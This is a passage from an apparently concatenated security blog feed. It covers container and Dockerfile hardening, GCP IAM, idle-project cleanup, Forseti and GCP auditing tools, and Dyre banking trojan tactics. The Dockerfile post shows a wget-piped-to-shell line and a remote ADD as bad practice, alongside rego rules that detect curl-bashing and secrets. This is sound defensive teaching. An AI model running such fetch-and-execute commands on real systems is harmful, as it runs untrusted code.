All of these checks are static and can be implemented for cheap as a step in the build pipelines.
Then we can move into scanning the container image.
Do not scan the image as a step in the build pipeline; instead, set up continuous scanning in the container registry.
Why? Vulnerabilities are continuously discovered, while your services are not necessarily continuously built. Secondly, builds are additive: every build will generate a new image. So, assuming your container orchestrator trusts your registry, every tag you publish can always be deployed and needs to be assessed.
(It’s also very slow to scan at build time)
This is where you start thinking about defining patch management and shelf life processes:
(next article will be about how to choose a container scanning solution, if you are facing the dilemma right now feel free to ping me)
The container infrastructure comprises all the moving parts that are in charge of pulling your images from the registry and running them as containers in production.
It’s mostly going to be the container orchestrator – *cough* kubernetes *cough*.
This stage’s goals:
Container orchestrators are complex, Kubernetes in particular. As of now they fall short of the DevOps promise, and I think we are still an abstraction layer (or two) away from a mainstream solution without too much operational overhead.
Every complex platform is prone to misconfiguration, and this is the part you want to focus on.
You have to threat model your infrastructure to ensure it can’t be abused. This particular threat model should focus on every actor but a compromised container (we will cover that next).
I can’t go into details here, because it really depends on what you are running. For Kubernetes a good starting point for threat modelling is this.
Additionally, if you are not doing it yet, this is also a good argument in favour of using a managed platform: the complexity is reduced if you can leverage a shared responsibility model with your (trusted) provider.
Next we can talk about what happens when a container is compromised.
You want to minimize the attacker’s ability to move laterally, focusing on these two layers:
The network should not be flat. You can start by brutally segmenting everything into subnetworks and work your way up to a full-fledged service mesh.
On the IAM layer, work your way toward having a single identity for each container in order to fine-tune the authorization grants. This is particularly important in multi-tenant platforms: without granular identities it’s impossible to achieve least privilege.
(Google Kubernetes Engine (GKE) has a nifty feature for this called Workload Identity)
Finally, since containers are supposed to be immutable, a wonderful strategy is to reduce the amount of time they can run: the window of opportunity for attackers to move laterally and gain persistence is as long as the container’s lifetime. Continuously shut down and spin up your containers.
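The lifetime policy is trivial to sketch (the 24-hour threshold is an assumption, pick your own):

```python
from datetime import datetime, timedelta, timezone

MAX_LIFETIME = timedelta(hours=24)  # assumed policy: recycle containers daily

def should_recycle(started_at: datetime, now: datetime) -> bool:
    """True once a container has outlived the allowed window."""
    return now - started_at > MAX_LIFETIME
```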
And this final consideration allows me to smoothly move into the next area.
The last piece of the puzzle is the security of your running workloads. At this point most of the hardening is done and here is when we move into the realm of reactive security controls, the grim land of post-fail.
This stage’s goals:
The best way to control the impact of an attack is to minimize the time between the breach and the moment the security team is alerted.
Detecting an ongoing breach is another area where vendors are scrambling to find a silver bullet. There are many approaches, most of them will require side cars and/or daemon sets actively monitoring pod’s traffic and system calls.
Most solutions will provide some value but my advice is to start simple and iterate: use your existing SIEM, ingest your platform, application and audit logs.
Incidents will happen, and it’s fine: have an incident response process.
The first bullet point of every post-mortem should be: “how can we detect this quicker next time?”. Answering it will allow you to identify your blind spots, which you can then use to understand which signals you are missing and what makes sense to buy.
Container security is a broad problem and it is not just about scanning images.
This is the model I built and used to reason about container risks and solutions. It’s very high level and of course, as with every model, it’s not necessarily the right one.
We all know that in reality each infrastructure is a snowflake: so start with your own threat model and use this one as an inspiration.
]]>If you are a security team that just inherited a bunch of Google Cloud Platform (GCP) accounts, this guide is for you.
IAM revolves around the concept of identity: an (authenticated) entity to which authorization grants are applied.
In Google Cloud, identities are called members and are the following:
To make things spicier, there are also two special members that you are going to hate and you want to make sure they will never be used (unless there are valid business reasons):
Pro Tip:
Make sure allAuthenticatedUsers and allUsers are never used.

You assign (bind) a Role to a Member to grant that identity access to a resource. An example role is resourcemanager.projectCreator:
$ gcloud iam roles list
…
---
description: Access to create new GCP projects.
etag: AA==
name: roles/resourcemanager.projectCreator
stage: GA
title: Project Creator
---
…
Roles are a set of permissions grouped together, each one representing a fine grained operation. You can’t assign permissions directly to members.
An example permission would be resourcemanager.projects.create:
$ gcloud iam roles describe roles/resourcemanager.projectCreator
description: Access to create new GCP projects.
etag: AA==
includedPermissions:
- resourcemanager.organizations.get
- resourcemanager.projects.create
name: roles/resourcemanager.projectCreator
stage: GA
title: Project Creator
Usually, every cloud service will come with a dedicated set of Roles (not for Google Container Registry).
As a rule of thumb stick to standard roles, but if you have to bind a role to a member in a high-level policy you might want to use a custom role. Custom Roles allow you to group together the specific set of permissions you need.
They are helpful to maintain least privilege because a role bound on a high-level policy (like the Organization one) will affect far more resources.
Pro Tip:
There are a bunch of roles you should be wary of: primitive roles. These are Owner, Editor and Viewer. When they are bound on the Project IAM policy they translate to admin, write and read access to everything inside that project.
You want to be wary for two reasons:
If you can’t escape using a primitive role, bind it to members that you will use only in “break the glass” scenarios. In practice, you don’t want a team doing their day to day operations as Owners.
Pro Tip:
Roles are bound to members in an IAM Policy. Policies are organized in hierarchical layers (from top to bottom):
Bindings will be inherited from top to bottom.
So if you assign Storage Admin to a service account in the Organization IAM Policy, the same grant will be applied to everything down (don’t do that).
You obviously want to be extra careful when binding roles high in the hierarchy as the authorization grant will be quite large. That’s why it’s a good idea to use custom roles to shrink it to just the permissions you need.
Some specific cloud resources, such as Buckets, have their own IAM policy. These are easy to overlook because they don’t have a consistent place in the google cloud admin interface.
The best way to get visibility over all IAM policies is to create a Cloud Asset Inventory (CAI) dump. CAI is, in my opinion, the most useful thing in GCP. It’s an API that will generate a json (or bigquery) dump of all the resources and IAM Policies you are currently running.
The best thing you can do on day one is to set up periodical CAI dumps, and then build your detections on top of them.
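As an example of a detection built on top of a CAI dump, here is a sketch that flags public members in a newline-delimited JSON export (field names are assumed; adjust to your dump format):

```python
import json

PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}

def public_bindings(ndjson_lines):
    """Scan a newline-delimited CAI IAM-policy dump for public members."""
    findings = []
    for line in ndjson_lines:
        asset = json.loads(line)
        for binding in asset.get("iamPolicy", {}).get("bindings", []):
            if PUBLIC_MEMBERS & set(binding.get("members", [])):
                findings.append((asset["name"], binding["role"]))
    return findings
```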
The second best thing is to use the IAM Recommender: a service that monitors how role bindings are actually used to make sure you are not over granting them.
Another helpful trick to know is that you can attach conditions to role bindings. For example you can set an expiration time, or you can scope down the binding to affect only certain resources matching a pattern.
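For illustration, a binding with an expiry condition might be assembled like this (the expression follows the IAM Conditions CEL syntax; the names are made up):

```python
def expiring_binding(member: str, role: str, expires_iso: str) -> dict:
    """IAM binding whose condition stops matching after a deadline."""
    return {
        "role": role,
        "members": [member],
        "condition": {
            "title": "temporary-access",
            # CEL: the grant only applies while request.time is before the deadline.
            "expression": f'request.time < timestamp("{expires_iso}")',
        },
    }
```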
Pro Tip:
Service accounts can be of two types: google managed and user managed.
A user managed service account is one you manually create. To use it, you need to create a private key and embed it into your application. A service account can have multiple keys.
The Service Account key lifecycle is your responsibility: keys never really expire and are hard to audit (you can’t see which key has been used from the audit logs). From day one you should start thinking about how to keep track of them.
Personally I am a fan of wrapping keys creation into an internal service for your developers to use, but I understand it’s not always possible.
The best alternative is to use google managed service accounts. For example each project will come with a default service account that is used by Google Compute Engine (GCE) services (if the GCE API is enabled).
This means that virtual machines will transparently be identified by that service account, and they are authorized to request short-lived authorization tokens from the internal metadata service. You can configure them to use a service account of your choice and no keys are involved.
Pro Tip:
To recap:
Make sure allAuthenticatedUsers and allUsers are never used.

There is a lot more to say about IAM governance and security best practices. This article’s purpose is to give a high level overview of the main security considerations.
If you are looking for specific advice, let me know. I might have some.
Finally, I highly recommend this fantastic talk by Kat Traxler about primitive roles and IAM quirks in GCP.
]]>A good part of my day to day is spent trying to automate away problems. Over the years I learned how to invest my time wisely, and I made a habit of researching and using available tools before coding my own.
As a consequence I have a fairly large collection of utilities I keep nurturing, alongside references, commands and debugging adventures.
I thought I could as well make it public, so here we are: check it out.
Every tool has a page where I (will) store my own notes: see my very own docker-security as an example. I am still cleaning most of them up and will publish a bit at a time.
I’ll also commit a more compact version to github.
In the meanwhile if you have some tools to share please do!
]]>Shutting off resources is such a low-hanging fruit from a risk perspective that as a security engineer you should make it a daily habit.
After all the most secure computer is the one that’s been turned off!
The bigger and more complex a cloud infrastructure becomes, the harder it gets to find unmaintained stuff.
Having an inventory system in place, as early as possible, would prevent so many headaches but even the most enlightened leadership will have a hard time justifying the investment.
Eventually the problem will outgrow security and spill into other areas such as cloud spending (gasp!): that’s when everyone will start talking about inventories, accountability and resources lifecycle.
Until then how to find things to kill?
Start with the Projects. The GCP model encourages segmenting the infrastructure’s logical areas into Projects, and a lot of audit facilities are aggregated at that level. (Obviously Projects will also silently introduce cost multipliers such as VPCs, but we will leave this for another rant.)
There are three sources one can query:
Use these three and you can build your own personal heuristic that will answer the question: can I kill this?
Events that change state and configuration of cloud services are collected in the Admin Activity and System Event audit logs.
While both track configuration changes, only the Admin Activity log captures manual changes driven by direct user action: creation of resources, change of IAM policies, etc.
The retention is ~400 days and I would check the frequency of these log entries to understand if services were being configured recently.
Usually an active project implies an active administrator.
We can query the billing account(s) to get a per project cost/usage report.
If the cost graph is flat, that could be an indicator that the project is idling. In contrast, plotting an active project’s cost will result in a bumpy curve, as buckets fill up, logs are generated and resources are added and removed over time.
It’s worth keeping in mind that we can also get usage reports for Compute Engine services. It’s mostly a data point about the lifecycle of resources rather than their usage - but can still contribute to our killer algorithm.
Nobody knows a project better than its owner, so we can’t go wrong if we ask politely. The problem is finding that person.
The solution is to scrape the IAM policy.
I’d start by searching role bindings for Owner, Editor or Viewer as they are the basic roles in GCP.
If we are lucky we will get a Group or a User’s email.
If we get a Service Account (SA) we can investigate it. When a SA is bound with a basic role, 99% of the time it’s been created in another project. So we can recursively scrape that project’s IAM and keep going until we find a human.
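The recursive scrape can be sketched in a few lines. It leans on the fact that a service account email embeds its home project; the input shape and depth limit are assumptions:

```python
def find_human(project, iam, depth=0, max_depth=5):
    """iam maps project -> list of members holding basic roles.
    Follows service accounts to their home project until a human shows up."""
    if depth > max_depth:
        return None
    for member in iam.get(project, []):
        kind, _, email = member.partition(":")
        if kind in ("user", "group"):
            return email
        if kind == "serviceAccount":
            # SA emails look like <name>@<project>.iam.gserviceaccount.com
            home_project = email.split("@")[1].split(".")[0]
            found = find_human(home_project, iam, depth + 1, max_depth)
            if found:
                return found
    return None
```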
There are two things I learned the hard way as a security artisan:
As such my cruft hunting algorithm is called can_I_MAYBE_kill_this() and works like this:
Note that deleting a project triggers a soft deletion: you have 30 days to change your mind before resources are actually decommissioned (although Cloud Storage services get decommissioned faster, usually ~a week).
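For illustration, the three signals described earlier could be combined like this (the thresholds are assumptions, and the owner always gets the final word):

```python
def can_i_maybe_kill_this(days_since_admin_event, monthly_costs, owner_said_yes):
    """Conservative cruft heuristic: every signal must agree and a human
    still signs off before anything is shut down."""
    idle = days_since_admin_event > 90      # no recent manual changes in audit logs
    flat = len(set(monthly_costs)) <= 1     # no bumps in the billing curve
    return idle and flat and owner_said_yes
```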
The take away is that finding and shutting down idle cloud resources is not straightforward and can’t be solved with a cron job.
Shut down other people’s resources at your risk and peril: be nice, ask, nudge and implore them to take care of their things.
Keep track of every time you have to track down owners. Make accountability and resource lifecycle a chapter of your threat model and build a case to lobby for an inventory system.
If you have someone in charge of keeping track of spending, go and talk to them: change is never introduced in isolation, and there isn’t anything better than mixing cost savings and security to get attention (and budget).
Happy hunting.
]]>I’ve compiled a list of common docker security issues and how to avoid them. For every issue I’ve also written an Open Policy Agent (OPA) rule ready to be used to statically analyze your Dockerfiles with conftest. You can’t shift more left than this!
You can find the .rego rule set in this repository. I appreciate feedback and contributions.
The first docker security issue to prevent is including plaintext secrets in the Dockerfile.
Secrets distribution is a hairy problem and it’s easy to do it wrong. For containerized applications one can surface them either from the filesystem by mounting volumes or more handily through environment variables.
Unfortunately, using ENV to store tokens, passwords or credentials is bad practice: Dockerfiles are usually distributed with the application, so this is no different from hard-coding secrets in code.
How to detect it:
secrets_env = [
"passwd",
"password",
"pass",
# "pwd", can't use this one
"secret",
"key",
"access",
"api_key",
"apikey",
"token",
"tkn"
]
deny[msg] {
input[i].Cmd == "env"
val := input[i].Value
contains(lower(val[_]), secrets_env[_])
msg = sprintf("Line %d: Potential secret in ENV key found: %s", [i, val])
}
Another common docker security issue is the high risk of supply chain attacks.
For containerized applications this kind of risk is introduced from the hierarchy of layers used to build the container itself.
The main culprit is obviously the base image used. Untrusted base images are a high risk and whenever possible should be avoided.
Docker provides a set of official base images for the most used operating systems and apps. By using them, we increase the security of our Docker containers by leveraging some sort of shared responsibility with Docker itself.
How to detect it:
deny[msg] {
input[i].Cmd == "from"
val := split(input[i].Value[0], "/")
count(val) > 1
msg = sprintf("Line %d: use a trusted base image", [i])
}
This rule is tuned towards DockerHub’s official images. It’s very dumb since I’m only detecting the absence of a namespace.
The definition of trust depends on your context: change this rule accordingly.
Pinning the version of your base images will give you some peace of mind with regards to the predictability of the containers you are building.
If you rely on latest you might silently inherit updated packages that in the best worst case might impact your application reliability, in the worst worst case might introduce a vulnerability.
How to detect it:
deny[msg] {
input[i].Cmd == "from"
val := split(input[i].Value[0], ":")
contains(lower(val[1]), "latest")
msg = sprintf("Line %d: do not use 'latest' tag for base images", [i])
}
Pulling stuff from the internet and piping it into a shell is as bad as it gets. Unfortunately it’s a widespread way to streamline software installation.
wget -O - https://cloudberry.engineering/absolutely-trustworthy.sh | sh
The risk is the same as framed for supply chain attacks and it boils down to trust. If you really have to curl bash, do it right:
How to detect it:
deny[msg] {
input[i].Cmd == "run"
val := concat(" ", input[i].Value)
matches := regex.find_n("(curl|wget)[^|^>]*[|>]", lower(val), -1)
count(matches) > 0
msg = sprintf("Line %d: Avoid curl bashing", [i])
}
This might be a bit of a stretch, but the reasoning is the following: you want to pin the versions of your software dependencies; if you do apt-get upgrade you will effectively upgrade them all to the latest version.
If you do upgrade and you are using the latest tag for the base image, you amplify the unpredictability of your dependencies tree.
What you want to do is to pin the base image version and just apt/apk update.
How to detect it:
upgrade_commands = [
"apk upgrade",
"apt-get upgrade",
"dist-upgrade",
]
deny[msg] {
input[i].Cmd == "run"
val := concat(" ", input[i].Value)
contains(val, upgrade_commands[_])
msg = sprintf("Line %d: Do not upgrade your system packages", [i])
}
One little feature of the ADD command is that you can point it to a remote URL and it will fetch the content at build time:
ADD https://cloudberry.engineering/absolutely-trust-me.tar.gz /tmp/
Ironically the official docs suggest to use curl bashing instead.
From a security perspective the same advice applies: don’t.
Get whatever content you need before, verify it and then COPY. But if you really have to, use trusted sources over secure connections.
Note: if you have a fancy build system that dynamically generates Dockerfiles, then ADD is effectively a sink asking to be exploited.
How to detect it:
deny[msg] {
input[i].Cmd == "add"
msg = sprintf("Line %d: Use COPY instead of ADD", [i])
}
Root in a container is the same root as on the host machine, restricted only by the docker daemon configuration. No matter the limitations, if an actor breaks out of the container they will still be able to find a way to get full access to the host.
Of course this is not ideal and your threat model can’t ignore the risk posed by running as root.
As such it is best to always specify a user:
USER hopefullynotroot
Note that explicitly setting a user in the Dockerfile is just one layer of defence and won’t solve the whole running as root problem.
Instead one can — and should — adopt a defence in depth approach and mitigate further across the whole stack: strictly configure the docker daemon or use a rootless container solution, restrict the runtime configuration (prohibit --privileged if possible, etc), and so on.
How to detect it:
any_user {
input[i].Cmd == "user"
}
deny[msg] {
not any_user
msg = "Do not run as root, use USER instead"
}
As a corollary of do not run as root: you shall not sudo either.
Even if you run as a user make sure the user is not in the sudoers club.
deny[msg] {
input[i].Cmd == "run"
val := concat(" ", input[i].Value)
contains(lower(val), "sudo")
msg = sprintf("Line %d: Do not use 'sudo' command", [i])
}
Docker security, or container security in general, is tricky and there are many solutions to minimize risks.
In this article I demonstrated how to tackle the problem from the build phase, by setting up a simple security linter for Dockerfiles. If you wish to learn more you might find my introduction to container security informative.
Thanks for reading!
This work has been inspired and is an iteration on prior art from Madhu Akula.
]]>If you were to operate a colocated machine in a datacenter — or a whole datacenter — you would be responsible for the security of it: from the very bottom of the physical stack (“who can touch the machines”) to the physical networking, up to the staircase of infinite software abstraction layers.
The cloud removes a lot of the hassle, since you are practically renting computing resources from someone else. This means your provider will take care of a lot of things for you and the higher you are in the As A Service stack, the less stuff you are responsible for.
In short, the provider is responsible for the security of their cloud, while you are responsible for the security in their cloud.
In practice on the Infrastructure as a Service (IaaS) layer boundaries are sharp: you get a virtual machine and you are in charge of what to run on it.
As soon as we step into the Platform as a Service (PaaS) layer things get fuzzier. Every platform service is a snowflake: to abstract away as much infrastructure as possible, things have to be opinionated, and some configuration decisions are taken for you (and the provider is responsible for them) while for others you have the freedom to mess things up.
Finally in the Software as a Service (SaaS) layer the situation gets calmer again: it’s mostly about how to authenticate and authorize identities.
So as a security engineer what should you care about?
I don’t have a direct answer because — as everything in security — it depends.
But the rule of thumb is:

Microsoft documentation is well written and extensive, dig their docs.

Google does not have a go-to resource for the shared responsibility model anymore; they redirect you here.
But they have detailed security models for specific services.
We tend to take the concept of shared responsibility for granted, in particular if we are used to cloud native environments.
The main issue, as I see it, arises when you grow outside the boundaries of a single cloud provider and suddenly have to face the perils of a multi cloud or hybrid environment.
This is when it’s better to keep an eye on the nuances between providers’ models, in particular on the PaaS layer: there might be some areas that do not overlap as you expect, and those can become blind spots.
Note: I intend to keep this article up to date so it can serve the purpose of having a single reference.
]]>There are many models that help to understand an attack lifecycle in depth, but from a practical perspective assume all attackers will do the following endlessly: compromise a resource, gain persistence, move laterally.

As a defender you will need to walk forward and backward through this cycle to stop the bleeding, and the tricky part is identifying the entry point: the resource that was compromised first.
The entry point is the front door you left open. It is usually a resource that is publicly exposed like a virtual machine running a public website.
If you identify a compromised resource that is not publicly exposed, most probably the attacker reached it by moving laterally.
Lateral movement happens when the attacker compromises other resources starting from one that has already been breached.
It is enabled by two factors:
These two factors define the blast radius: the area that an attacker can traverse inside your infrastructure and, as a consequence, the impact of the attack.

The textbook example of lateral movement is breaching a website, gaining access to the virtual machine running it, finding the credentials to the backend database, and compromising it.
In the cloud you can model attacker movements on three layers, which are loosely related to the way the cloud stack is segmented (IaaS, PaaS, SaaS):
The network layer is mostly tied to infrastructure services (the “I” in IaaS).
It boils down to a classic network security problem: which cloud services are connected to the same Virtual Private Cloud (VPC), which firewall rules are in place, etc.
In the worst case a compromised virtual machine’s blast radius is everything attached to the same VPC.
IAM is how access control is governed in the cloud. It's about authorising identities to perform certain actions on specific cloud services.
The concept of identity is fluid between cloud providers but it can be described as the authenticated entity to which authorisation grants are assigned. A user, a group, a service account, a workload.
Because identities can be very different things, and authorisation grants can be very granular, understanding the blast radius becomes complicated quickly.
From the attacker's perspective, compromising a user or compromising a random cloud service can have the very same impact if they hold the same authorisation grants.
From a defender's point of view, however, you will hardly be able to apply the same security controls, the same auditing and the same monitoring practices to both.
In short, IAM is the layer where the economics of an attack skew in favour of the attacker.
All the secrets and credentials that are bundled in the application layer of a service will also contribute to the blast radius, since they can be used to access and compromise further resources.
Think of passwords to databases, API tokens, credentials to third-party services.
Modelling the lateral movements and the blast radius of an attack is an obligatory step for successful containment of a breach.
Incident resolution will only be as effective as how fast we can answer the question: "what services am I running in my infrastructure, and how can they be reached?"
So be prepared: invest in an inventory of running cloud services you can query quickly and map their interconnections on the three different layers.
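As a toy sketch of why such an inventory pays off, the blast radius on any of the three layers can be modelled as reachability in a directed graph of resources, where an edge is any network path, IAM grant, or embedded credential. All resource names below are hypothetical:

```python
from collections import deque

def blast_radius(edges, entry_point):
    """Return every resource reachable from the entry point.

    `edges` maps a resource to the resources it can reach, via any
    layer: network connectivity, IAM grants, or embedded credentials.
    """
    seen = {entry_point}
    queue = deque([entry_point])
    while queue:
        current = queue.popleft()
        for target in edges.get(current, []):
            if target not in seen:
                seen.add(target)
                queue.append(target)
    return seen

# Hypothetical inventory: a public VM, a VPC peer, and a database
# reachable through credentials found on the web server.
edges = {
    "public-web-vm": ["internal-vm", "db-credentials"],
    "db-credentials": ["customer-db"],
    "internal-vm": [],
    "customer-db": [],
}
print(sorted(blast_radius(edges, "public-web-vm")))
```

Walking the graph backwards from a compromised resource is the same query in reverse: which entry points could have led the attacker here.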
]]>In fact, there are no dedicated Identity Access Management (IAM) Roles to govern publishing and retrieval of container images: to push and pull we must use role bindings that will grant write (and read) to the underlying bucket that GCR is using.
According to the docs this bucket is artifacts.<PROJECT-ID>.appspot.com and the roles to use are roles/storage.admin and roles/storage.objectViewer (but any powerful primitive role such as Owner, Editor and Viewer will do).
The role binding can be applied to the IAM policy of the Project, Folder, Organization or the bucket itself.
While binding the role on the bucket’s IAM could be fine, binding on an IAM policy higher in the hierarchy will result in a wider authorization grant affecting all buckets in scope.
Such a grant could have an impact on your compliance posture. A common example is if one of the buckets contains Personally Identifiable Information (PII) and your organization is subject to GDPR.
IAM is tricky and things get messier when the number of Projects we need to administer increases and there is a business case to give programmatic access to all GCR instances. For example if we have a centralized build system that needs to push container images, or if we need to integrate a third party container scanner.
In such cases, especially when a third party is involved, binding a Service Account with read/write permissions to the GCS layer is unacceptable as it will increase a potential attack’s blast radius.
While we wait for Google to implement a set of dedicated Roles (see Artifact Registry), there are a couple of solutions we can adopt to minimize the authorization grant.
The first is organizational: minimize the number of GCR instances. Ideally, if you can use a single instance, you can bind the Role on the associated bucket's IAM policy. A small number of instances could be managed that way, but I'll let you decide what small means in your context.
The second solution is technical: leverage IAM Conditions to reduce the scope of the role binding to only the buckets that are used by GCR. IAM Conditions is a feature of Cloud IAM that allows operators to scope down role bindings.
Luckily these buckets follow a similar naming pattern, which we can use to set up a role binding that applies only when the bucket's name matches, like this:
{
  "expression": "resource.name.startsWith(\"projects/_/buckets/artifacts\")",
  "title": "GCR buckets only",
  "description": "Reduce the binding scope to affect only buckets used by GCR"
}
This solution is pragmatic and scales well with the number of Projects / Folders affected, as long as there are no other buckets named artifact*.
Keep in mind that you need to use the full bucket identifier in the condition, and if GCR is configured to use explicit storage regions, the bucket name will be (eu|us|asia).artifacts.<PROJECT-ID>.appspot.com.
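Before rolling a binding out, it can help to sanity-check the expression's matching logic locally. This tiny sketch mimics the CEL startsWith semantics; the bucket names are hypothetical:

```python
def condition_matches(resource_name: str) -> bool:
    # Mimics: resource.name.startsWith("projects/_/buckets/artifacts")
    return resource_name.startswith("projects/_/buckets/artifacts")

# The default GCR bucket matches...
print(condition_matches("projects/_/buckets/artifacts.demo-project.appspot.com"))  # True
# ...an unrelated bucket does not...
print(condition_matches("projects/_/buckets/pii-exports"))  # False
# ...but a regional bucket is prefixed with eu./us./asia.,
# so it needs its own condition or the binding silently won't apply:
print(condition_matches("projects/_/buckets/eu.artifacts.demo-project.appspot.com"))  # False
```

The last case is exactly the regional-bucket caveat: a prefix condition written for the default bucket name will not cover region-scoped GCR buckets.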
Also available here.
]]>Spotify engineering teams are fully embracing the devops culture: to increase development speed every dev team is responsible for their operational pipelines. From a security perspective we are continuously striving to bake security into those pipelines by leveraging security automation and self serve security tooling. The industry lingo for this is “SecDevOps”.
The friction of provisioning machines and experimenting has been significantly reduced since our shift to a cloud infrastructure on the Google Cloud Platform. Dev teams are now able to freely add pieces to our infrastructure seamlessly, but this freedom also introduced complexity from a security perspective, since it made it harder to scale our hardening efforts at the same pace.
For this reason we started building our own tools to audit GCP: the goal was to quickly detect and fix security misconfigurations as they arise.
Running these specialized tools has proven to be a huge step forward, but it also highlighted some non obvious problems on how to properly audit and address issues on a growing infrastructure. It was clear we still lacked precise visibility over our resources and therefore it was very hard to keep an audit trail of changes and additions. We couldn’t look back at what the state of the infrastructure was at a certain point in time, and thus we couldn’t properly investigate in case of incidents.
While detecting misconfigurations was a solved problem, we also discovered that identifying ownership and addressing misconfigured resources was adding too much to the security team's workload.
Enter Forseti
To address these gaps we asked Google to join forces and step up our cloud security game. The result of our efforts is Forseti, an open source security Swiss Army knife for Google Cloud.
Forseti is composed of different components with specialized use cases. As a first step, the tool takes a snapshot of the current infrastructure by building an inventory of every active resource. Secondly, it runs different scanners on the snapshot to highlight security misconfigurations. Every violation discovered raises an alert.
Finally, we can also automatically enforce policies/configurations as soon as an issue is detected: for example, any violation in a project's IAM policy or firewall configuration will be fixed.
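Conceptually, that snapshot-scan-alert-enforce loop can be sketched like this (a simplified illustration, not Forseti's actual code; the rule and resource shapes are invented):

```python
# Hypothetical inventory snapshot: one firewall rule is wide open.
snapshot = [
    {"type": "firewall", "name": "allow-ssh", "source": "10.0.0.0/8"},
    {"type": "firewall", "name": "allow-all", "source": "0.0.0.0/0"},
]

def scan(resources):
    """Flag firewall rules open to the whole internet."""
    return [r for r in resources
            if r["type"] == "firewall" and r["source"] == "0.0.0.0/0"]

def enforce(resource):
    """Revert the violating rule to a safe default (stubbed out here)."""
    resource["source"] = "10.0.0.0/8"

violations = scan(snapshot)
for v in violations:
    print(f"ALERT: {v['name']} allows {v['source']}")  # notify the owning team
    enforce(v)
```

The real system snapshots live cloud APIs instead of a list and routes alerts through a notification pipeline, but the control loop is the same.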

While developing Forseti we deployed it from the start. This helped us refine the scanning rules and identify which resources we needed to inventorize the most.
We’ve now reached a first point of maturity and at the time of writing we are successfully auditing every day:
(not an exhaustive list of all resource types audited)
The inventory alone is giving us a grand overview of the state of the infrastructure and provides a detailed audit trail we can tap into in case of incidents and internal investigations.
With the current setup we are able to identify many violations on the spot, for example: public GCS buckets, exposed CloudSQL instances, unexpected entries in IAM policies and bogus firewall rules.
By plugging into Forseti's extensible notification system we are able to automatically deliver alerts directly to the team owning the affected resource, along with instructions on how to fix the problem, freeing the security team from the burden of getting manually involved.
This new level of automation allows the security team to be involved only when an alert hasn’t been acknowledged or the team affected needs direct support.
There is still lots of room for improvement, but we are already getting a lot of value out of Forseti and will keep working on it. We would love to see a community grow around the tool: you can read more about Forseti on the Google Cloud Platform blog and on the Forseti website, and join the discussion in the forum and on GitHub!
]]>As a result of these efforts, we are excited to open source two of our internal tools, in the hope of benefiting the community and sharing knowledge.
Both tools are heavily used within Spotify, and we hope other Google Cloud customers find benefit as well. Contributions are enthusiastically welcome!
Inspired by Scout2, we built a security auditing tool dedicated to the Google Cloud Platform: GCP-Audit.
The tool allows analysts to scan Google Cloud projects to highlight common security issues like inadequate permissions on storage buckets, publicly exposed Compute Engine instances, misconfigured CloudSQL, and more. Issues are defined by an internal rules repository that is designed to be easily expandable.
For example, we believe that in a cloud environment, reducing the number of exposed services is critical to minimize our attack surface and effectively enforce security controls.
Consider the following rule:
{
  "name": "Traffic allowed from all IP's to CloudSQL instance",
  "filters": [{
    "matchtype": "exact",
    "filter": {
      "settings": {
        "ipConfiguration": {
          "authorizedNetworks": [{
            "value": "0.0.0.0/0"
          }]
        }
      }
    }
  }]
}
This rule will find CloudSQL instances that are exposed to 0.0.0.0/0. Rule definitions support either JSON or YAML format, and the GCP-Audit engine will apply the filters defined in the rule to Google’s API responses, then check if there are any concerning differences.
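At its core, an engine like this checks whether the filter document is contained in the API response. A minimal sketch of such an exact-match containment check (an illustration of the idea, not GCP-Audit's actual implementation):

```python
def matches(filter_doc, response):
    """True if every key/value in filter_doc appears in response,
    recursing into nested dicts and lists (exact matchtype)."""
    if isinstance(filter_doc, dict):
        return (isinstance(response, dict) and
                all(k in response and matches(v, response[k])
                    for k, v in filter_doc.items()))
    if isinstance(filter_doc, list):
        return (isinstance(response, list) and
                all(any(matches(f, r) for r in response) for f in filter_doc))
    return filter_doc == response

# The filter from the rule above, applied to two hypothetical responses.
rule_filter = {"settings": {"ipConfiguration":
               {"authorizedNetworks": [{"value": "0.0.0.0/0"}]}}}

exposed = {"name": "prod-sql", "settings": {"ipConfiguration":
           {"authorizedNetworks": [{"value": "0.0.0.0/0"}]}}}
safe = {"name": "dev-sql", "settings": {"ipConfiguration":
        {"authorizedNetworks": [{"value": "10.0.0.0/8"}]}}}

print(matches(rule_filter, exposed))  # True: instance open to the world
print(matches(rule_filter, safe))     # False
```

Extra keys in the response (like `name`) are ignored, which is what makes the filter composable against verbose API payloads.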
Learn more about it on GitHub
We’ve found that monitoring firewall rules across multiple networks of cloud services is burdensome: maintaining a consistent firewalling policy between ephemeral services and a sane audit trail spanning through different projects is a task that does not scale easily. To improve the process and automatically increase our cloud security stance, we’ve built GCP-Firewall-Enforcer.
The goal of this tool is to continuously enforce an audited set of firewall rules across multiple Google Cloud projects. This way, accidental firewall alterations are promptly detected and automatically fixed.
The approach provides multiple benefits: we can automatically mitigate dangerous firewall issues as they happen, as well as easily monitor and investigate network issues. This enabled our security team to maintain control of firewall policies while allowing for reviews by network specialists.
Read more about it on GitHub
]]>In the landscape of web maliciousness, Remote Administration Trojans 1 are not a new trend, but their usage is still strong and growing steadily.
At its core a RAT is a backdoor used to let an attacker enter the victim's computer unnoticed and control it remotely: for example, most banking trojans nowadays use remote desktop modules to open a VNC/RDP channel, allowing an attacker to exfiltrate money from within the user's browser inside their legitimate session.
Newer sophisticated malware like Dyre has stepped up the game by completely diverting the user to fake banking portals while keeping the login session alive in the background; once the user has disclosed the required credentials, the attacker connects to the user's machine via a remote desktop channel and performs the wire fraud unnoticed.
The usual attack consists of two phases.
In the first, a Dyre-infected user enters the banking website address in the browser and the request is proxied by the malware to a fake website identical to the bank's, as it appears just after the real login. In the background, Dyre keeps the real banking session open.
The second phase happens as soon as the attacker receives an automated Jabber notification with the user's session data and a VNC callback to a protected terminal server. He then starts interacting with the user, pushing challenging questions, fake pages and fake login fields into the fake browsing session. While the user answers the attacker's forms, providing the needed information, the attacker starts a screen control session towards the user's PC and uses the real session to perform the wire fraud.
This is why this kind of attack is so hard to detect: for the most part the attack killchain 2 happens out of reach of the bank's anti-fraud capabilities. The only exception is the final exfiltration phase, when the only thing left is the chance to detect the attacker's session; but even then the attacker is coming from within the legitimate user session, making things harder.
These inner weaknesses of classic agentless fraud detection techniques are the reason behind the increase of popularity and sophistication of this kind of attacks.
Since all agentless fraud detection can do is spot infected users or spot the attacker's session, diverting users to web fakes and masquerading the attacker's session has a high chance of nullifying the whole detection.
How, then, can a bank portal understand what's going on, if what it sees is a session initiated from the usual user's IP address, with the usual user's browser fingerprint, without any kind of webinject/AST or other common indicators of compromise?
